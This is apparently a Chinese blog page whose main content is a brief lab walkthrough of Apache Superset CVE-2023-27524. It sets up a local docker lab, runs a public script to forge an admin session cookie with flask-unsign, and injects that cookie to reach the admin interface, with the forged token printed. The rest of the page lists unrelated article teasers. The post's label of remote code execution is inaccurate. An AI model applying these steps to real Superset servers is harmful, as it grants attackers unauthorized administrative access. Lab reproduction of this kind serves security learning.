当前位置：首页 > article >正文

ApacheSuperset CVE-2023-27524

article 2025/6/6 7:00:12

前言:CVE-2023-27524 是一种远程代码执行漏洞，攻击者通过该漏洞可在受影响系统上执行任意代码，从而获得未授权访问权

CVE-2023-27524 GitHubhttps://github.com/horizon3ai/CVE-2023-27524

任务一代理 | 拉取镜像

vi /etc/proxychains4.conf
//最下面修改真机IP端口

docker compose up -d
docker ps
//拉取成功后查看8088就是服务器端口

任务二 python 问题解决

python3 CVE-2023-27524.py --url 192.168.247.139:8088 --id 1 --validate
//发现缺少 ‘flask_unsign’

python3 -m venv myenv
source myenv/bin/activate
//创建并激活一个虚拟环境

//安装 flask-unsign
proxychains4 pip install flask-unsign

任务三生成cookie

python3 CVE-2023-27524.py --url 192.168.247.139:8088 --id 1 --validate
//下面这样就是安装成功了【eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.aEAshA.TmTRYFed6TPxFmeOmLRrQAXX3vc】

任务四替换cookie

//随便下载一个cookie的小插件 我用的是cookieManage

//替换进去保存，刷新一下就进管理界面了

任务五实验结束

ApacheSuperset CVE-2023-27524

前言:CVE-2023-27524 是一种远程代码执行漏洞，攻击者通过该漏洞可在受影响系统上执行任意代码，从而获得未授权访问权 CVE-2023-27524 GitHubhttps://github.com/horizon3ai/CVE-2023-27524 任务一代理 | 拉取镜像 vi /etc/proxychains4.conf //最下面修…...

编程日记 2025/6/6 7:00:12

Windows Server部署Vue3+Spring Boot项目

在Windows Server 上部署Vue3 Spring Boot前后端分离项目的详细步骤如下： 一、环境准备安装JDK 17 下载JDK MSI安装包（如Oracle JDK 或 OpenJDK） 双击安装，配置环境变量： JAVA_HOME：JDK安装路径&#xf…...

编程日记 2025/6/6 19:06:36

malloc 是如何分配内存的？——C 语言内存分配详解

文章目录 malloc是如何分配内存的？——C语言内存分配详解一、引言二、内存分配的基本概念1. 虚拟内存与物理内存2. 进程内存布局三、malloc函数详解1. 函数原型与功能2. 关键特性四、malloc的底层实现机制1. 内存分配器的角色2. 分配策略3. 内存碎片问题五、glib…...

编程日记 2025/6/6 6:46:19

Opencl

**OpenCL（Open Computing Language）**是一种用于异构平台（包括CPU、GPU、FPGA、DSP等）上的并行计算框架和编程标准。它由Khronos Group制定，旨在提供一种跨平台、统一的编程接口，使开发者可以利用不同硬件设…...

编程日记 2025/6/6 21:14:21

如何在 HTML 中添加按钮

原文：如何在 HTML 中添加按钮 | w3cschool笔记 （请勿将文章标记为付费！！！！） 在网页开发中，按钮是用户界面中不可或缺的元素之一。无论是用于提交表单、触发动作还是导航&#xff0…...

编程日记 2025/6/6 14:05:45

【优秀三方库研读】quill 开源库中的命名空间为什么要用宏封装

将命名空间封装成宏的作用与优势 QUILL_BEGIN_NAMESPACE 和 QUILL_END_NAMESPACE 这种宏封装是 C++ 库开发中的常见技巧，主要解决以下问题并提供显著优势： 1. 解决核心问题：命名空间嵌套与版本控制问题场景：库需要支持多版本共存（如 quill::v1, quill::v2），但希望默认…...

编程日记 2025/6/6 10:09:52

1. chemical_component_sets.pickle 运行alphafold3遇到下面的问题: FileNotFoundError: [Errno 2] No such file or directory: /xxx/xxx/anaconda3/envs/alphafold3/lib/python3.11/site-packages/alphafold3/constants/converters/chemical_component_sets.pickle搜索你的系…...

编程日记 2025/6/6 18:28:12

Linux--进程的程序替换

问题导入： 前面我们知道了，fork之后，子进程会继承父进程的代码和“数据”（写实拷贝）。那么如果我们需要子进程完全去完成一个自己的程序怎么办呢？ 进程的程序替换来完成这个功能！ 1.替换原理…...

编程日记 2025/6/6 6:26:15

调教 DeepSeek - 输出精致的 HTML MARKDOWN

【序言】不知道是不是我闲的蛋疼，对百度AI 和 DeepSeek 的回答都不太满意。 DeepSeek 回答句子的引用链接，始终无法准确定位。有时链接只是一个域名，有时它给的链接是搜索串如: baidu.com/?q"搜索内容"。百度AI 回答句子的引用…...

编程日记 2025/6/6 7:13:09

【笔记】Windows系统部署suna基于 MSYS2的Poetry 虚拟环境backedn后端包编译失败处理

基于 MSYS2（MINGW64）中 Python 的 Poetry 虚拟环境包编译失败处理笔记一、背景在基于 MSYS2（MINGW64）中 Python 创建的 Poetry 虚拟环境里，安装 Suna 开源项目相关包时编译失败，阻碍项目正常部署。后端…...

编程日记 2025/6/6 14:17:17

GQA（Grouped Query Attention）：分组注意力机制的原理与实践《一》

GQA（Grouped Query Attention）是近年来在大语言模型中广泛应用的一种注意力机制优化方法，最初由 Google 在 2023 年提出。它是对 Multi-Query Attention (MQA) 的扩展，旨在平衡模型性能与计算效率。 🌟 GQA 是什么&…...

编程日记 2025/6/6 8:17:40

【深度学习优化算法】02：凸性

【作者主页】Francek Chen 【专栏介绍】 ⌈ ⌈ ⌈PyTorch深度学习 ⌋ ⌋ ⌋ 深度学习 (DL, Deep Learning) 特指基于深层神经网络模型和方法的机器学习。它是在统计机器学习、人工神经网络等算法模型基础上，结合当代大数据和大算力的发展而发展出来的。深度学习最重…...

编程日记 2025/6/5 6:02:13

JAVA国际版一对一视频交友视频聊天系统源码支持H5+APP

全球畅连无界社交：JAVA国际版一对一视频交友系统源码（H5APP双端覆盖） 在全球化社交需求激增的今天，构建一个支持多语言、适配国际支付且功能丰富的视频交友平台，成为出海创业者和企业的核心诉求。JAVA国际版一对一视频…...

编程日记 2025/6/6 18:37:31

策略公开了：年化494%，夏普比率5.86，最大回撤7% | 大模型查询akshare，附代码

原创内容第907篇，专注智能量化投资、个人成长与财富自由。这位兄弟的策略公开了，年化494%，夏普比率5.86，最大回撤7%，欢迎大家前往围观： http://www.ailabx.com/strategy/683ed10bdabe146c4c0b2293 系统代…...

编程日记 2025/6/6 18:22:47

【C++】string类的模拟实现（详解）

文章目录上文链接一、整体框架二、构造函数1. default2. copy3. range 三、析构函数四、拷贝构造(1) 传统写法(2) 现代写法五、赋值重载(1) 传统写法(2) 现代写法六、获取元素1. operator[ ] 七、迭代器1. begin2. end 八、容量相关1. size2. reserve3. clear 九、修改操作1…...

编程日记 2025/6/6 18:54:04

业界宽松内存模型的不统一而导致的软件问题, gcc, linux kernel, JVM

当不同CPU厂商未能就统一的宽松内存模型（Relaxed Memory Model）达成一致，很多软件的可移植性会收到限制或损害，主要体现在以下几个方面： 1. 可能的理论限制 1.1. 并发程序的行为不一致现象上，同一段多线程…...

编程日记 2025/6/6 19:12:31

多模态大语言模型arxiv论文略读（101）

ML-Mamba: Efficient Multi-Modal Large Language Model Utilizing Mamba-2 ➡️ 论文标题：ML-Mamba: Efficient Multi-Modal Large Language Model Utilizing Mamba-2 ➡️ 论文作者：Wenjun Huang, Jiakai Pan, Jiahao Tang, Yanyu Ding, Yifei Xing, …...

编程日记 2025/6/6 18:46:31

量化Quantization初步之--带量化(QAT)的XOR异或pyTorch版250501

量化(Quantization)这词儿听着玄，经常和量化交易Quantitative Trading (量化交易)混淆。其实机器学习(深度学习)领域的量化Quantization是和节约内存、提高运算效率相关的概念（因大模型的普及，这个量化问题尤为迫切）。揭秘机器…...

编程日记 2025/6/6 15:44:32

Linux Maven Install

在 CentOS（例如 CentOS 7 或 CentOS 8）中安装 Maven（Apache Maven）的方法主要有两种：使用包管理器（简单但可能版本较旧），或者手动安装（推荐，可获得最新版&…...

编程日记 2025/6/5 5:54:47

#Java篇：学习node后端之sql常用操作

学习路线 1、javascript基础； 2、nodejs核心模块 fs: 文件系统操作 path: 路径处理 http / https: 创建服务器或发起请求 events: 事件机制（EventEmitter） stream: 流式数据处理 buffer: 处理二进制数据 os: 获取操作系统信息 util: 工具方…...

编程日记 2025/6/6 18:52:05